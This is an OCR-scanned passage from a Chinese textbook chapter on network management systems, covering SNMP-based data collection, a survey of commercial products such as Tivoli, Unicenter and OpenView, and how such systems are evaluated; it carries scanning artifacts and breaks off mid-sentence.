在 性 能 要 求 上 ， 则 需要 达到 以 下 基本 要 求 。 


1) 


精度 要 求 


对 特殊 的 输入 必须 有 必要 的 验证 ， 如 瑟 、MAC 地 址 的 格式 ， 日 期 、 时 间 的 格式 。 


2) 


时 间 特 性 要 求 


至 少 包括 以 下 几 点 : 


响应 时 间 ， 对 于 所 有 的 用 户 界面 操作 ， 应 该 达到 无 可 感知 的 延迟 。 
刷新 处 理 时 间 ， 对 于 除数 据 导 出 和 报表 生成 之 外 的 操作 ， 无 可 感知 的 刷新 延迟 。 
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@ ”数据 的 转换 和 传送 时 间 ， 数 据 导出 和 报表 生成 根据 数据 量 的 要 求 控制 在 月 报表 1 
个 小 时 ， 年 报表 12 小 时 之 内 。 


3) ”灵活 性 要 求 
e@ ”操作 方式 需要 提供 : 菜单 栏 菜单 ， 界 面 左 键 /右键 菜单 ， 界 面 图 形 按钮 等 多 种 操 
作 方 式 。 


e@ ”运行 软件 的 操作 系统 需要 支持 较 新 的 全 系列 Windows 操作 系统 ， 且 在 各 操作 系 
统 上 保持 软件 界面 的 美观 性 和 功能 的 稳定 性 。 
e@ ”软件 需要 在 各 种 参数 设置 方面 提供 灵活 方便 的 修改 方式 ， 对 历史 日 志 提 供 良好 的 
查询 接口 和 丰富 的 报表 统计 样式 。 
e@ ”软件 需要 具有 良好 的 可 扩展 性 ， 且 提供 方便 的 数据 接口 以 便 用 户 使 用 。 
另外 ， 在 接口 需求 方面 ， 需 要 支持 符合 软件 要 求 的 数据 导入 接口 ， 同 时 能 够 支持 导出 
软件 的 数据 到 标准 的 数据 库 ， 如 Mysql、Oracle、Excel 等 标准 数据 格式 的 导出 。 在 可 靠 性 
方面 则 至 少 要 求 不 与 其 他 软件 运行 产生 冲突 ， 同 时 保证 系统 至 少 7x24 小 时 可 靠 运转 。 


3. 网 络 管理 系统 的 应 用 程序 


通常 为 了 实现 特定 的 事务 处 理 和 结构 支持 ， 网 管 软件 中 有 必要 加 入 一 些 有 价值 的 应 用 
程序 ， 以 扩展 网 管 软件 的 基本 功能 。 这 些 应 用 程序 也 可 由 第 三 方 供应 商 提供 ， 网 管 软件 集 
成 水 平 的 高 低 取决 于 网 络 管理 系统 的 核心 服务 和 厂商 产品 的 功能 。 常 见 网 管 软件 中 的 应 用 
程序 主要 有 高 级 警报 处 理 、 网 络 仿真 、 策 略 管 理 和 故障 标记 等 。 


11.1.4 ”网 络 管理 系统 实现 数据 采集 的 典型 示例 


数据 采集 是 网 络 管理 系统 正常 运行 和 工作 的 基础 ， 本 节 就 网 络 管理 系统 最 常见 的 几 个 
典型 的 功能 ， 简 要 介绍 一 下 数据 采集 的 通用 方法 。 

1) ”设备 和 线路 监控 

针对 设备 和 线路 监控 ， 网 络 管理 系统 通常 是 利用 SNMP 协议 获取 被 监控 网 络 设备 、 
通信 线路 的 有 关 信息 ， 包 括 系统 信息 、 接 口 状态 、 端 口 接口 映射 、ARP 表 、 路 由 表 、 
MAC 地 址 转发 表 、CPU 负荷 、 接 口 带宽 动态 和 接口 历史 流量 数据 等 ， 通 过 SNMP 协议 控 
制 网 络 设备 接口 的 开 闭 并 俘获 网 络 设备 TRAP。 

为 完成 这 一 工作 ， 要 求 网 络 设备 必须 启动 SNMP 服务 ， 且 支持 MIB 库 的 读 取 ， 这 样 
就 能 正确 读 出 路 由 表 、ARP 表 和 接口 IP 地 址 表 ; 交换 设备 除了 需要 支持 MIB 库 读 取 ， 还 
需要 和 Bridge MIB 库 打交道 ， 这 样 才能 正确 读 出 端口 /接口 映射 表 和 MAC 地 址 转发 表 。 

2) ”服务 器 和 应 用 监控 

服务 器 和 应 用 监控 通常 需要 网 络 管理 系统 通过 主机 的 SNMP 服务 获得 被 监控 服务 器 
和 应 用 的 有 关 人 信息， 包括 系统 信息 、 网 络 连接 、TCP 连接 、 程 序 运行 、 软 件 安装 、CPU 
负荷 、 存 储 设 备 、 系 统 配置 、Windows 网 络 服务 、Windows 用 户 账号 等 信息 ， 通 过 SNMP 
服务 俘获 主机 TRAP， 通 过 TCP 协议 获得 服务 端口 状态 。 同 理 ， 系 统 获 得 上 述 信息 ， 服 务 
器 必须 支持 SNMP 服务 和 相应 的 Host Resources MIB(RFC 1514) 及 应 用 服务 (如 
ORACLE、MS-SQL、WEBLOGIC 等 )MIB 库 等 。 
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3) ”网 段 监 控 

网 段 监控 则 可 以 通过 读 取 路 由 设备 来 获得 网 段 的 配置 、 路 由 、 网 关 带 宽 和 流量 等 信息 
来 完成 。 

4) 主机 接 入 监控 

网 络 管理 系统 通常 都 是 以 MAC 地 址 作为 入 网 计算 机 的 唯一 标识 符 。 系 统 提 供 的 入 网 
计算 机 识别 信息 通常 包括 人 P 地 址 、MAC 地 址 、 上 连 设 备 端口 、Windows 计算 机 名 、 
Windows 域 组 名 、Windows 用 户 登录 名 等 ， 这 些 信息 可 以 识别 和 定位 一 台 计 算 机 。 其 中 
卫 地 址 、MAC 地 址 提供 了 入 网 计算 机 的 地 址 信息 ，Windows 计算 机 名 、Windows 域 组 
名 、Windows 用 户 登 录 名 则 提供 了 入 网 计算 机 的 Windows 网 络 配置 信息 ， 而 上 连 设备 端 
口 提 供 了 入 网 计算 机 的 设备 连接 信息 。 

5) ”IP/MAC 地 址 信息 采集 

由 于 IP 网 络 是 通过 路 由 信息 完成 不 同 网 段 间 的 IP 转发 ， 根 据 ARP 协议 (地 址 解析 协 
议 ) 完 成 网 络 层 人 P 地 址 到 数据 链 路 层 MAC 地 址 的 映射 和 转发 ， 因 此 路 由 设备 内 部 均 设 有 
ARP 表 ， 这 张 表 包 括 了 一 段 时 间 内 该 路 由 设备 直 连 网 段 主 机 的 IP/MAC 地 址 映射 信息 ， 
且 这 段 时 间 由 路 由 设备 的 ARP TIMEOUT( 老 化 时 间 ) 设 置 决 定 ， 路 由 设备 ARP 表 中 包含 了 
直 连 网 段 所 有 Windows 主机 、 非 Windows 主机 、 网 络 设备 的 IP/MAC 信息 。 因 此 网 络 管 
理 系 统一 般 通 过 读 取 路 由 设备 ARP 表 获 得 该 路 由 设备 所 有 直 连 网 段 的 IP/MAC 地 址 
信息 。 

6) ”交换 机 连接 信息 采集 

网 络 管理 系统 通常 通过 扫描 交换 设备 的 MAC 地 址 转发 表 来 获得 MAC 地 址 与 设备 端 
口 的 映射 关系 ， 并 根据 MAC 地 址 转发 关系 发 现 设 备 互 连 端口 并 定位 用 户 到 交换 机 端口 。 

7) ”Windows 网 络 信息 采集 

Windows 网 络 信 息 包括 计算 机 名 、 所 属 域 组 和 用 户 登录 名 等 。Windows 网 络 信息 是 
通过 Windows 网 络 服务 中 的 NETBIOS 协议 获得 的 ， 如 果 被 扫描 主机 不 是 Windows 操作 
系统 ， 或 禁止 NETBIOS 端口 ， 则 一 般 不 能 扫描 发 现 到 Windows 信息 。 如 果 一 个 上 线 人 Pp 
是 一 台 Windows 机 器 并 且 NETBIOS 端口 打开 ， 则 网 络 管理 系统 就 可 以 发 现 这 台 机 器 的 
Windows 信息 。 


11.2 ”实用 网 络 管理 系统 


当前 主流 网 络 管理 系统 都 已 从 面向 网 络 设备 的 管理 过 渡 到 面向 网 络 业 务 的 管理 ， 它 们 
将 网 络 服务 和 业务 作为 网 管 对 象 ， 通 过 实时 监测 与 网 络 业 务 相 关 的 设备 和 应 用 ， 模 拟 客户 
行为 测量 网 络 业 务 的 服务 质量 ， 收 集 网 络 应 用 的 业务 资料 ， 进 行 全 方位 、 多 视角 的 网 络 业 
务 运行 的 监控 ， 从 而 实现 网 络 业 务 的 故障 管理 、 性 能 管理 和 配置 管理 等 。 目 前 ， 从 性 能 和 
市 场 占有 率 上 看 ，Advent 公司 的 Advent 系列 产品 、HP 的 OpenView、IBM 的 NetView、 
CA 的 Unicenter TNG、Micromuse 公司 的 NetCool、ConCord 公司 的 eHealth console 产品 、 
NetScout 公司 的 NetScout 等 产品 占据 了 绝 大 部 分 市 场 ，Cisco 和 H3C 等 网 络 公司 也 都 有 况 
争 力 很 强 的 网 管 软件 。 另 外 ， 中 国 本 土 的 一 些 厂商 ， 如 华为 的 Manager 系列 、 神 州 数码 网 
络 的 LinkManager、 北 大 青鸟 的 青鸟 网 硕 (NetSureXpert)、 北 塔 软件 的 综合 网 管 软件 、 康 邦 
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科技 有 限 公司 的 基线 网 管 和 大 用 软件 的 eUniVision 等 网 管 产品 也 占据 了 一 定 的 市 场 份额 。 
11.2.1 当前 主流 网 络 管理 系统 的 介绍 


就 国外 网 管 产品 而 言 ， 典 型 的 是 IBM Tivoli、HP OpenView 和 CA Unicenter 三 大 品 
牌 ， 这 些 系统 功能 强大 ， 履 盖 了 网 络 管理 的 计 费 、 认 证 、 配 置 、 性 能 和 故障 的 各 个 方面 。 
但 产品 复杂 度 高 ， 往 往 需要 专业 化 的 技术 团队 来 进行 管理 ， 且 具有 投入 大 、 实 施 周期 长 的 
特点 ， 比 较 适 合 一 些 大 型 的 专业 IT 领域 的 用 户 和 ISP 运营 商 来 使 用 。 相 对 于 国外 的 网 管 
产品 ， 国 内 网 络 管理 软件 提供 商 在 分 析 了 本 土 企业 需求 和 实际 情况 的 基础 上 ， 提 出 了 “ 基 
于 平台 级 设计 思路 ”和 “面向 业务 ”， 实 现 对 网 络 、 服 务 器 、 应 用 程序 的 综合 管理 ， 其 特 
点 是 实用 简单 、 本 土 化 服务 强 以 及 价格 便宜 ， 因 此 也 受到 了 国内 用 户 的 青睐 。 此 外 ， 在 网 
管 软件 市 场 中 ， 如 Cisco、H3C 等 网 络 设备 生产 商 通常 也 都 拥有 一 些 非常 优秀 的 网 络 管理 
系统 。 本 节 我 们 将 对 一 些 典 型 网 络 管理 系统 的 特点 和 适用 对 象 做 一 个 简单 介绍 。 

1) IBM Tivoli NetView 

IBM Tivoli NetView 产品 秉承 了 IBM 的 风范 ， 关 注 高 端 用 户 ， 特 别 是 针对 对 IBM 整 
体 解决 方案 有 需求 的 用 户 。Tivoli NetView 软件 中 包含 一 种 全 新 的 网 络 客户 程序 ， 这 种 基 
于 Java 的 控制 台 比 以 前 的 控制 台 具 有 更 大 的 灵活 性 、 可 扩展 性 和 直观 性 ， 可 允许 网 管 人 
员 从 网 络 中 的 任何 位 置 访问 Tivoli NetView 数据 。 从 这 个 新 的 网 络 客户 程序 中 可 以 获得 有 
关节 点 状况 、 对 象 收集 与 事件 方面 的 信息 ， 也 可 对 Tivoli NetView 服务 器 进行 实时 诊断 ， 
如 图 11-10 所 示 。Tivoli NetView 采用 分 布 式 的 管理 ， 减 少 了 整体 系统 的 维护 费用 ， 同 时 
Tivoli NetView 兼容 多 种 厂家 的 设备 并 拥有 全 球 数 百 个 厂商 的 支持 。 


er 一 一 一 = 
rT q 图 了 业务 管理 视图 
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图 11-10 ”IBM Tivoli NetView 产品 框架 示意 图 


目前 在 金融 领域 ,借助 BM 主机 在 该 领域 的 强大 用 户 群 体 ， 该 产品 具有 超过 50% 的 
市 场 份额 ， 在 其 他 行业 ， 如 电信 、 食 品 、 医 疗 、 旅 游 、 政 府 、 能 源 和 制造 业 等 也 有 众多 
用 户 。 
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2) CA Unicenter 

Computer Associates (NYSE: CA) 是 全 球 领先 的 电子 商务 软件 公司 ，Unicenter 就 是 
CA 公司 的 一 套 网 管 产品 。 它 的 显著 特点 是 功能 丰富 、 界 面 友 好 、 功 能 比较 细 化 。 同 时 它 
提供 了 各 种 网 络 和 系统 管理 功能 ， 可 以 实现 对 整个 网 络 架构 的 每 一 个 细节 的 控制 ， 确 保 网 
络 环境 的 可 用 性 。 从 网 络 和 系统 管理 角度 来 看 ，Unicenter 可 以 在 NT 到 大 型 主机 的 所 有 平 
台 上 ; 从 自动 运行 管理 方面 来 看 ， 它 可 以 实现 日 常 业务 的 系统 化 管理 ， 确 保 各 主要 架构 组 
件 (Web 服务 器 、 应 用 服务 器 和 中 间 件 服务 器 ) 的 性 能 和 运转 。 从 数据 库 管 理 来 看 ， 它 还 可 
以 对 业务 逻辑 进行 管理 ， 确 保 整 个 数据 库 范围 的 最 佳 服务 。 

Unicenter 网 络 管理 主要 解决 了 两 方面 的 问题 : 设备 管理 和 性 能 管理 。 它 不 仅 可 以 对 
支持 标准 SNMP( 简 单 网 管 协议 ) 的 设备 进行 直接 管理 ， 还 能 够 对 不 支持 SNMP 协议 的 网 络 
设备 进行 管理 ， 极 大 地 扩展 了 设备 管理 的 范围 。 在 采集 和 汇总 大 量 原始 数据 的 基础 上 ， 
Unicenter 的 性 能 管理 可 根据 用 户 业 务 考核 指标 的 要 求 自动 生成 直观 、 易 懂 的 性 能 报表 ， 
通过 Unicenter， 来 自 各 个 系统 、 数 据 库 、 应 用 系统 所 产生 的 消息 、 报 警 等 事件 ， 将 自动 
传送 到 管理 员 那 里 ， 而 无 须 等 待 系统 轮 询 。 管 理 员 对 需要 报告 的 事件 和 程度 进行 方便 的 定 
义 和 修改 ， 以 满足 用 户 的 具体 需要 ， 根 据 这 些 事件 ， 管 理 员 可 以 灵活 地 定义 事件 发 生 之 后 
的 相应 措施 。Unicenter TNG 体系 结构 提供 了 开放 、 集 成 、 全 面 的 IT 治理 解决 方案 ， 其 多 
层 体系 结构 能 够 从 最 简单 的 桌面 系统 应 用 扩展 到 大 型 复杂 的 网 络 ， 能 够 在 整个 企业 实现 治 
理 控 制 的 分 布 ， 从 而 减轻 网 络 流量 ， 提 高 可 伸缩 性 和 效率 。 通 过 Unicenter TNG， 用 户 可 
以 获得 的 功能 和 特性 包括 : Web 服务 器 治理 、 改 进 服务 水 平 、 全 面 的 企业 安全 治理 、 实 现 
网 络 智 能 化 、 简 化 桌面 系统 和 服务 器 治理 、 将 可 治理 性 用 于 应 用 等 。 

CA 针对 Unicenter 的 新 价格 模式 按 弃 了 “了 Power Units” 的 报价 方法 ， 代 之 以 分 层次 的 
定价 模式 ， 大 大 简化 了 购买 和 维护 程序 。 加 上 此 前 发 布 的 灵活 的 业务 模式 ， 它 是 业界 对 客 
户 最 友好 的 基础 架构 管理 解决 方案 的 授权 方式 。 产 品 适 用 于 电信 运营 商 、IT 技术 服务 
商 、 金 融 、 运 输 、 企 业 、 教 育 、 政 府 等 网 管 方面 有 大 规模 投入 、IT 管理 机 构 健 全 、 维 护 
人 员 水 平 较 高 的 用 户 ， 产 品 服务 范围 涵盖 了 电力 、 政 府 、 制 造 业 、 汽 车 、 邮 政 电信 、 金 
融 、 保 险 等 多 个 领域 。 

3) HP OpenView NNM 

HP OpenView 网 管 软件 NNM(Network Node Manager) 以 其 强大 的 功能 、 先 进 的 技术 和 
多 平台 适应 性 在 全 球 网 管 领域 得 到 了 广泛 的 应 用 。HP OpenView NNM 具有 计 费 、 认 证 、 
配置 、 性 能 与 故障 管理 等 多 种 功能 ， 特 别 适 合 网 管 专家 使 用 。 另 外 ，HP OpenView NNM 
能 够 可 靠 运行 在 HP-UX10.20/11.X、Sun Solaris 2.5/2.6、Windows NT 4.0 等 多 种 操作 系统 
平台 上 ， 它 能 够 对 局 域 网 或 广域网 中 所 涉及 的 每 一 个 环节 中 的 关键 网 络 设备 及 主机 部 件 
(包括 CPU、 内 存 、 主 板 等 ) 进 行 实时 监控 ， 可 发 现 所 有 意外 情况 并 发 出 报警 ， 可 测量 实际 
的 端 到 端 应 用 响应 时 间 及 事务 处 理 参数 。HP OpenView 比较 适合 电信 运营 商 、 移 动 服务 供 
应 商 、ISP、 宽 带 服 务 供应 商 等 在 网 管 方面 有 大 规模 投入 、 具 备 网 管 专家 、 而 且 HP-UX 设 
备 较 多 的 用 户 。 

4) ”Cisco 网 管 系统 

Cisco 网 管 系统 具有 基于 Intemet 体系 结构 的 优势 ， 可 以 向 用 户 提供 更 高 的 可 访问 性 ， 并 
且 能 有 最 大 限度 简化 网 络 治理 的 任务 和 进程 。Cisco 的 网 络 治理 策略 一 一 Assured Network 
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Services( 保 证 网 络 服务 ) 也 正在 引导 着 网 络 治理 从 传统 应 用 程序 转向 具备 下 列 特征 的 基于 
Web 的 模型 : 基于 标准 ， 简 化 工具 、 任 务 和 进程 ， 与 网 络 治理 系统 (NMS) 平 台 和 一 般 治 理 
产品 的 Web 级 集成 ， 能 够 为 治理 路 由 器 、 交 换 机 和 访问 服务 器 提供 端 到 端 解决 方案 ; 通 
过 将 发 现 的 设备 与 第 三 方 应 用 集成 ， 创 建 一 个 内 部 治理 网 。Cisco 的 系列 网 络 管理 产品 包 
括 了 针对 各 种 网 络 设备 性 能 的 治理 、 集 成 化 的 网 络 治理 、 远 程 网 络 监控 和 治理 等 功能 。 目 
前 ，Cisco 的 网 络 治理 产品 包含 了 基于 Web 的 产品 和 基于 控制 台 的 应 用 程序 。 其 产品 系列 
包括 增强 的 工具 以 及 基于 标准 的 第 三 方 集成 工具 ， 功 能 上 包括 治理 库存 、 可 用 性 、 系 统 变 
化 、 配 置 、 系 统 日 志 、 连 接 和 软件 部 署 以 及 用 于 创建 内 部 治理 网 的 工具 。 另 外 ， 网 络 治理 
工具 还 包括 一 些 其 他 的 独立 应 用 程序 。 目 前 Cisco 的 网 管 产品 主要 应 用 在 互联 网 、 公 安 、 
金融 、 民 航 、 海 关 、 新 闻 、 商 业 等 领域 。 

5) ”国内 网 管 软件 的 介绍 

目前 国内 主流 的 网 管 软件 主要 包括 游 龙 公司 的 SiteView、 摩 卡 软件 、 北 塔 、 网 利 、 艾 
德 威 特 、 网 强 等 产品 ， 游 龙 科技 的 SiteView 和 网 利 更 偏向 主机 服务 器 、 操 作 系 统 、 数 据 
库 、 中 间 件 等 的 全 面 监控 ， 北 塔 、 艾 德 威 特 和 网 强 是 从 网 络 设备 监控 起 家 ， 相 对 来 说 北 塔 
和 艾 德 威 特 更 有 特点 一 些 。 摩 卡 软件 是 这 几 年 的 后 起 之 秀 ， 在 短 短 的 几 年 时 间 内 ， 就 将 产 
品 从 单一 的 IT 运 维 ， 发 展 成 目前 全 系列 的 IT 系统 监控 和 管理 ， 可 以 说 相对 融合 了 国外 的 
ITSM 和 国内 的 网 管 产品 。 
国内 网 管 软件 一 般 都 具有 和 良好 的 协议 分 析 功 能 ， 并 支持 各 种 不 同 网 络 流 采 集 协议 ， 包 
括 Netflow、Netstream、Sflow、Cflow、IPFIX 等 各 厂家 协议 标准 ; 无 论 是 哪 种 Flow 格 
式 ， 都 定义 了 数据 交互 的 标准 格式 ， 一 般 网 管 软件 都 能 够 通过 这 些 格式 规范 支持 业内 几乎 
所 有 的 主流 网 络 设备 ， 如 Cisco、Foundry、Extreme、Juniper、 华 为 、H3C 等 ， 保 证 了 对 
采集 目标 设备 的 兼容 性 。 同 时 也 支持 端口 镜像 功能 ， 可 以 根据 相关 的 需求 进行 端口 镜像 。 
流量 分 析 支 持 对 广域网 核心 层 、 广 域 出 口 、 局 域 网 核心 层 、 局 域 网 汇聚 层 网 络 流量 的 监控 
与 分 析 ， 实 现 整 网 流量 多 点 的 可 视 性 。 除 此 以 外 ， 大 多 网 管 软件 都 有 很 好 的 报表 分 析 功 
能 ， 能 够 提供 自 定义 报表 功能 ， 管 理 员 可 以 根据 自己 的 需求 定义 报表 模板 ， 相 关 对 应 端口 
的 速率 、 流 量 、 应 用 等 指标 数据 ， 并 以 最 流行 的 报表 展示 形式 ， 如 受 加 图 、 二 维 饼 图 、 三 
维 饼 图 等 呈现 给 用 户 。 另 外 ， 基 于 国内 带宽 使 用 的 实际 情况 ， 大 多 网 管 软件 提供 了 应 用 映 
射 功能 ， 利 用 三 层 协 议 号 、 端 口号 等 协议 特征 可 识别 上 千 种 已 知 应 用 (比如 HTTP 应 用 、 
FTP 应 用 、MAIL 应 用 、P2P 等 )， 并 提供 应 用 自 定义 功能 ， 当 网 内 出 现 新 应 用 的 时 候 ， 很 
容易 进行 新 应 用 的 识别 ， 可 以 让 管理 人 员 在 查看 的 时 候 清晰 明了 。 


11.2.2 网络 管理 系统 的 测评 方法 

随 着 网 络 管理 系统 的 日 益 发 展 ， 对 网 络 管理 系统 的 评估 测试 正成 为 当前 网 络 设计 和 业 
务 部 署 中 的 重要 组 成 环节 。 本 节 将 简单 介绍 以 下 网 管 软件 测评 时 需要 考虑 的 几 个 方面 。 

1. 易 用 性 和 可 操作 性 测试 


网 管 软件 是 用 来 简化 网 络 管理 ， 提 高 工作 效率 的 ， 因 此 其 易 用 性 和 可 操作 性 非常 重 
要 。 在 《软件 工程 产品 质量 》(GB/T 16260 一 2003(ISO 9126-2001)) 质 量 模型 中 ， 易 用 性 包 
含 易 见 性 、 易 学 习性 和 易 用 性 ， 即 软件 产品 应 具有 容易 被 理解 、 学 习 、 使 用 和 吸引 用 户 的 
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能 力 。 易 见 性 是 指 单 任 观察 ， 用 户 就 可 以 应 知道 程序 的 状态 。 易 学 性 是 指 不 通过 帮助 文件 
或 仅 通过 简单 的 帮助 文件 ， 就 可 以 让 用 户 对 一 个 陌生 的 软件 产品 有 一 个 清晰 的 认识 。 最 后 
易 用 性 是 指 用 户 不 翻阅 手册 就 能 使 用 该 软件 。 易 用 性 和 可 操作 性 虽然 是 具有 一 些 主观 性 质 
的 评价 ， 但 是 对 于 网 管 软件 ， 以 下 几 点 非常 重要 。 

(1) 关键 操作 一 键 可 达 ， 重 要 链接 直接 明了 。 不 管 在 哪个 界面 ， 都 需要 尽量 遵守 这 个 
规则 。 

(2) 安装 配置 过 程 尽量 简单 ， 主 要 涉及 以 下 几 个 方面 。 

e@ ”对 安装 手册 和 安装 平台 的 评估 。 

e@ ”对 安装 自动 化 程度 的 测试 ， 即 安装 过 程 尽量 全 部 自动 化 ， 如 需 手 工 操作 的 要 尽量 

采用 选择 框 等 措施 。 

e@ ”安装 选项 和 设置 的 测试 。 

e@ ”安装 过 程 的 中 断 测试 ， 如 断 电 、 文 件 冲 突 等 。 

e@ ”对 多 环境 安装 测试 ， 如 标准 配置 、 最 低 配置 、 笔 记 本 等 环境 中 测试 。 

e@ ”对 安装 的 正确 性 测试 ， 如 考察 对 其 他 应 用 程序 是 否 有 影响 。 

此 外 ， 还 有 修复 安装 测试 与 卸载 测试 ， 如 检查 修复 安装 后 是 否 有 不 良 影响 ， 是 否 能 完 
全 印 载 ， 不 能 完全 卸载 时 有 无 明确 提示 等 。 

(3) 业务 符合 性 、 功 能 定制 性 、 业 务 模块 的 集成 度 、 数 据 共享 能 力 、 约 束 性 、 交 互 性 
和 错误 提示 等 应 遵循 一 定 规范 。 其 中 ， 业 务 符合 性 是 指 界面 风格 、 表 格 设计 、 业 务 流程 、 
数据 加 密 机 制 等 符合 相关 的 法 律 法 规 、 业 界 规划 以 及 使 用 人 员 的 习惯 ， 数据 共享 能 力 是 指 
数据 库 表 的 关联 和 数据 重用 ， 错 误 提示 测试 是 指 关 键 操 作 或 数据 删除 等 操作 前 是 否 有 明确 
的 提示 ， 或 报错 时 是 否 给 出 足够 的 出 错 原因 等 。 


2. 功能 测评 方面 


网 管 软件 的 功能 评测 主要 针对 网 管 功能 的 完备 性 ， 其 测评 结果 依赖 于 具体 的 使 用 环 
境 。 但 是 作为 一 个 通用 的 评测 方法 ， 一 般 可 以 从 网 管 的 基本 功能 去 着 手 ， 即 前 面 所 提 到 的 
故障 管理 、 配 置 管理 、 计 费 管 理 、 性 能 管理 和 安全 管理 五 大 基本 功能 。 

(1) 故障 管理 评测 主要 完成 对 网 络 故障 监控 和 协助 完成 故障 排除 的 测试 。 

进行 评测 时 ， 需 要 关注 三 个 功能 : 发 现 问题 、 隔 离 问题 和 解决 问题 。 前 两 个 功能 网 管 
软件 必须 要 支持 ， 第 三 个 功能 是 网 管 智能 程度 的 标志 ， 一 般 好 的 网 管 软件 会 尽 可 能 提供 多 
样 的 手段 完成 故障 定位 和 协助 管理 员 解 决 问题 。 

(2) 配置 管理 评测 主要 考评 对 当前 设备 配置 的 获取 能 力 及 对 配置 的 修改 能 力 。 

配置 管理 能 力 实际 反映 了 网 管 软件 对 网 络 的 控制 能 力 ， 配 置 能 力 越 强 的 网 管 对 网 络 的 
深度 管理 能 力 越 强 。 一 般 来 说 越 专业 的 网 管 配置 能 力 越 强 ， 通 用 网 管 的 配置 能 力 较 弱 。 需 
要 注意 的 是 ， 评 测 中 应 根据 实际 使 用 中 网 管 的 配置 要 求 进行 评测 ， 不 能 一 味 追 求 配置 能 力 
而 降低 了 网 管 的 可 扩展 性 和 开放 性 。 

(3) 安全 管理 测评 主要 考评 系统 对 事前 主动 防御 和 事后 安全 审计 两 方面 的 能 力 。 

其 中 防御 能 力 的 测评 主要 针对 网 络 访问 控制 功能 的 测试 ， 指 安全 威胁 未 发 生 时 网 管 软 
件 有 能 力 拒 绝 非法 用 户 对 网 络 的 访问 。 而 事后 安全 审计 功能 则 是 对 已 经 发 生 的 网 络 威胁 行 
为 进行 审计 的 能 力 。 
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(4) 性 能 管理 测评 主要 考评 网 管 软件 对 网 络 资源 使 用 的 监控 能 力 。 

网 管 软件 是 否 能 够 提供 对 网 络 资源 使 用 情况 的 监控 功能 ， 以 及 对 这 些 资源 指标 进行 有 
效 地 统计 分 析 ， 例 如 网 络 设备 接口 的 带宽 情况 ， 网 络 设备 内 存 与 CPU 的 占用 情况 等 。 

(5) 计 费 管理 测评 主考 考评 网 管 软件 对 用 户 资源 消耗 情况 的 统计 和 审计 能 力 。 

虽然 计 费 功能 并 不 是 网 管 软件 必 备 的 功能 ， 但 是 在 进行 接 入 设备 管理 的 网 络 中 ， 一 般 
都 要 求 网 管 具 有 计 费 功能 ， 计 费 功能 测评 的 重点 在 于 计 费 的 准确 性 和 灵活 性 。 


3. 性 能 测评 方面 


网 管 软件 的 性 能 测评 将 对 系统 在 一 定 硬件 平台 上 表现 出 来 的 管理 网 络 的 能 力 进行 性 能 
上 的 测评 ， 针 对 不 同 的 功能 需要 关注 不 同 的 性 能 指标 。 例 如 最 大 网 元 的 数量 、 最 大 网 络 事 
件 处 理 能 力 、 最 大 用 户 接 入 能 力 等 。 在 进行 性 能 评测 时 ， 由 于 实际 测试 环境 不 可 能 提供 最 
大 网 络 容量 ， 因 此 借助 测试 仪器 和 测试 软件 ， 用 于 模拟 网 络 并 发 及 数量 进行 网 管 性 能 测试 
的 软件 很 多 ， 常 见 的 商业 软件 有 Gambit MIMIC、AdventNet Simulation 等 。 这 类 软件 的 共 
同 特点 是 可 以 模拟 被 管理 设备 网 元 和 网 络 情况 ， 可 以 方便 设置 各 种 网 络 设备 参数 。 


4. 通用 性 和 可 扩展 性 评测 


通用 性 是 指 网 管 对 不 同 设备 的 兼容 能 力 。 要 测试 通用 性 ， 就 要 尽 可 能 多 的 配置 不 同 厂 
家 的 设备 。 由 于 不 同 厂商 的 设备 对 于 私有 MIB 的 实现 不 同 ， 因 此 可 以 重点 评估 其 公共 功 
能 部 分 ， 通 常 包括 设备 发 现 与 识别 、 拓 扑 管理 、 告 警 与 事件 管理 、 设 备 状 态 监 控 等 。 但 是 
对 于 一 些 主流 厂商 的 设备 ， 有 些 网 管 软件 可 以 实现 针对 厂商 私有 MIB 库 的 管理 ， 以 及 一 
些 深层 次 的 网 管 功能 ， 例 如 设备 面板 管理 、 配 置 管理 、 映 像 文 件 管理 等 。 

可 扩展 性 是 通用 网 管 实现 专业 网 管 功能 的 一 种 有 效 补 充 手 段 。 一 般 可 扩展 性 好 的 网 管 
软件 会 提供 网 管 系统 二 次 开发 接口 ， 使 用 户 可 以 根据 自己 的 网 络 管理 需求 开发 专业 功能 。 
评估 网 管 软件 的 可 扩展 性 ， 就 是 要 评估 系统 所 提供 的 二 次 开发 接口 的 丰富 性 和 可 开发 性 。 

由 于 网 管 功能 的 广泛 性 和 差异 性 ， 因 此 对 一 款 网 管 软件 的 评估 不 仅 局 限于 上 述 几 个 方 
面 ， 特 别 是 在 软件 选 型 测试 的 时 候 ， 应 该 根据 软件 应 用 环境 进行 需求 分 析 ， 合 理 制定 评测 
标准 。 


11.2.3 网络 管理 系统 功能 应 用 演示 


本 节 我 们 将 对 网 络 管理 系统 在 实际 网 络 中 的 一 些 典 型 应 用 进行 一 个 介绍 和 演示 ， 由 于 
各 个 厂商 的 网 络 管理 系统 在 实现 和 界面 上 差异 很 大 ， 这 里 我 们 仅 就 其 一 般 功能 进行 一 个 简 
单 的 介绍 。 


1. 设备 及 终端 监控 管理 


1) ”设备 状态 视图 

网 络 管理 系统 通常 提供 一 个 设备 状态 的 浏览 视图 (如 图 11-11 所 示 )， 并 且 可 通过 该 视 
图 支持 批量 导入 和 手动 添加 设备 。 通 常 在 该 视图 中 集成 了 设备 性 能 一 览 表 、 性 能 TOP-N 
表 、 端 口 一 览 表 、 关 键 设备 趋势 图 等 多 种 监控 视图 ， 方 便 管 理 员 从 多 视角 洞察 网 络 运行 情 
况 ， 集 中 监控 网 络 设备 、 通 信 线 路 的 实时 和 历史 性 能 ， 发 现 、 定 位 问题 的 根源 。 
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图 11-11 设备 状态 视图 


2) ”实时 动态 有 向 拓扑 图 

网 络 管理 系统 通常 可 以 利用 拓扑 发 现 算法 自动 计算 网 络 拓扑 ， 并 且 提供 实时 的 动态 有 
向 拓扑 图 (如 图 11-12 所 示 )， 来 表现 所 有 设备 、 线 路 的 状态 及 其 运行 参数 ， 实 现 了 参数 显 
示 的 全 局 化 ， 为 问题 发 现 提供 了 对 比 手段 。 通 过 有 向 拓扑 流量 绘图 技术 ， 不 但 可 以 全 面 监 
控 流量 的 大 小 ， 更 可 以 监控 流量 的 方向 ， 跟 踪 定位 异常 流量 的 来 源 。 
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图 11-12 ”动态 有 向 拓扑 图 


3) ”设备 端口 视图 

网 络 管理 系统 可 以 利用 设备 端口 视图 显示 端口 的 上 行 、 下 行 状 态 和 流量 ， 及 端口 用 
途 、 流 量 方向 和 传输 包 类 型 的 分 布 比例 ， 帮 助 管理 员 快 速 找到 问题 端口 。 通 过 观察 端口 连 
